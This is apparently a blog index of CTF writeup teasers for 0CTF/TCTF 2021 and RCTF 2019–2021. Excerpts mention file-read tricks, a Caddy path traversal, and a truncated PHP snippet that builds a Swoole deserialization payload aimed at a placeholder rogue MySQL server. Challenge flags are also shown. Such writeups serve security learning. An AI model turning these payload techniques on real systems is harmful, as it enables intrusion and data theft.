2021 0CTF/TCTF Final Writeup

2021 0CTF/TCTF Final Writeup Web Win-Win readfile finnaly call WINAPI CreateFileW https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilew When opening a volume or removable media drive (for example, a floppy disk drive or flash memory thumb drive), the lpFileName string should be the following form: “.\X:”. Do not use a trailing … “2021 0CTF/TCTF Final Writeup”

Read More

RCTF 2021 Official Writeup

RCTF2021 How to setup environment All CHALLENGE ENVIRONMENT CAN BE FINED IN RCTF2021 https://github.com/R0IS/RCTF2021 Web VerySafe I learn a funny issue from 2-and-a-bit-of-magic Caddy before 2.4.2 can path traversal in PHP-FPM At the same time, I think of MeowWorld in 巅峰极客 and camp-ctf-2015. Great thanks … “RCTF 2021 Official Writeup”

Read More

RCTF 2020 Official Writeup

WEB Swoole Solution Run the following code in Swoole to generate the payload: <?php function changeProperty ($object, $property, $value) { $a = new ReflectionClass($object); $b = $a->getProperty($property); $b->setAccessible(true); $b->setValue($object, $value); } // Part A $c = new \Swoole\Database\PDOConfig(); $c->withHost(‘ROUGE_MYSQL_SERVER’); // your rouge-mysql-server host & port … “RCTF 2020 Official Writeup”

Read More

RCTF 2019 Official Writeup (EN) (TBD)

Misc draw https://github.com/zsxsoft/my-ctf-challenges/tree/master/rctf2019/draw Just draw it with Logo Interpreter, just like PC Logo / MSWLogo / Berkeley Logo and so on.. Flag: RCTF_HeyLogo disk https://github.com/zsxsoft/my-ctf-challenges/tree/master/rctf2019/disk strings encrypt.vmdk for the flag’s part 1: rctf{unseCure_quick_form4t_vo1ume Fix the vmdk: create a new VMDK with VMWare and rename encrypt.vmdk … “RCTF 2019 Official Writeup (EN) (TBD)”

Read More